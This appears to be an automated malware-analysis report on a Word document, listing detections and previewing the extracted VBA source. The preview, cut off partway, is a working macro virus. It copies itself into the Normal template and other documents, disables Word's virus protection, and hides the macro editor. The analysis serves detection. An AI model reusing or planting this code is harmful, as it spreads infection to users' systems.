MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with multiple critical detections. It contains VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening or closing. The script attempts to copy VBA projects ('Rey' and 'Calivent') to the Normal template, suggesting an attempt to establish persistence or spread.
Heuristics 5
-
ClamAV: Doc.Trojan.CyberHack-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.CyberHack-2
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29710 bytes |
SHA-256: a4888c9ae95e9538d6d26d541f12df1fcfb89ec4cd2fa8393cdf3213c81984dc |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Rey"
'Att. Calivent as_99@latinmail.com (rey)
'Si Quieres Aprender Contactame
'Intercambio información, y colecciono virus de todas las marcas
Public cal1
Public cal2
Public cal3
Sub AutoOpen()
If Day(Now) = Minute(Now) Then Call Adornos
Call Principal
End Sub
Sub FileOpen()
Call Principal
Dialogs(wdDialogFileOpen).Show
Call Ocultar
Call Copiar1
Call Gravhack
Call Unimoq
End Sub
Sub Ocultar()
Moqu = Application.DisplayAlerts
Application.DisplayAlerts = wdAlertsNone
Call Moquegua
WordBasic.DisableAutoMacros 0
CommandBars("Visual Basic").Visible = False
CommandBars("Visual Basic").Enabled = False
CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
CommandBars("Visual Basic").Protection = msoBarNoCustomize
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
On Error GoTo 0
End Sub
Sub Unimoq()
Application.DisplayAlerts = Moqu
End Sub
Sub Copiar1()
On Error GoTo Jiu2
cal1 = 0
cal3 = False
Set Ad = ActiveDocument
Set NT = NormalTemplate
If cal3 = False Then
On Error GoTo Jit2
Application.OrganizerCopy Source:=NT.FullName, Destination:=Ad.FullName, Name:="Rey", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=NT.FullName, Destination:=Ad.FullName, Name:="Calivent", Object:=wdOrganizerObjectProjectItems
cal1 = 1
Jit2:
End If
Jiu2:
End Sub
Sub Copiar2()
Call Moquegua
On Error GoTo Jiu1
cal2 = False
Set Ad = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Jit1a
For i = 1 To NT.VBProject.VBComponents.Count
NMacr = NT.VBProject.VBComponents(i).Name
Next i
Jit1a:
If cal2 = False Then
On Error GoTo Jit1
Application.OrganizerCopy Source:=Ad.FullName, Destination:=NT.FullName, Name:="Rey", Object:=wdOrganizerObjectProjectItems
Application.OrganizerCopy Source:=Ad.FullName, Destination:=NT.FullName, Name:="Calivent", Object:=wdOrganizerObjectProjectItems
Templates(NT.FullName).Save
Jit1:
End If
Jiu1:
End Sub
Sub Principal()
Call Ocultar
Call Copiar2
Call Unimoq
End Sub
Sub Moquegua()
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub
Sub Gravhack()
On Error GoTo Jit4
Set Ad = ActiveDocument
If cal1 = 1 Then
Ad.SaveAs FileName:=Ad.Name, FileFormat:=wdFormatDocument
End If
Jit4:
End Sub
Sub AutoClose()
Call Ocultar
Call Copiar2
Call Copiar1
Call Unimoq
ActiveDocument.SaveAs
Call Principal
End Sub
Sub FileClose()
Call Ocultar
Call Copiar2
Call Copiar1
Call Unimoq
ActiveDocument.SaveAs
Call Principal
Call Sys
End Sub
Sub FileSaveAs()
Call Ocultar
Call Copiar2
Call Copiar1
Call Unimoq
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub HelpAbout()
On Error GoTo Jiu3
Calivent.Show
Jiu3:
Call Principal
Call Gusto
End Sub
Sub HerramMacro()
On Error GoTo Jiu3
Calivent.Show
Application.OnTime Now + TimeValue("00:30:02"), "adornos"
Jiu3:
Call Principal
End Sub
Sub FileExit()
Call Ocultar
Call Copiar2
Call Copiar1
On Error GoTo Jiu4
If WeekDay(Date) = 5 Then Calivent.Show
Jiu4:
Call Unimoq
WordBasic.FileExit
End Sub
Sub ToolsCustomize()
On Error Resume Next
Call Principal
End Sub
Sub ToolsCustomizeKeyboard()
On Error Resume Next
Call Principal
End Sub
Sub ToolsOptions()
Dialogs(wdDialogToolsOptions).Show
Call Principal
End Sub
Sub FileNew()
Call Principal
Dialogs(wdDialogFileNew).Show
End Sub
Sub FileTemplates()
On Error Resume Next
Call Principal
End Sub
Sub ViewVBCode()
Calivent.Sh
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.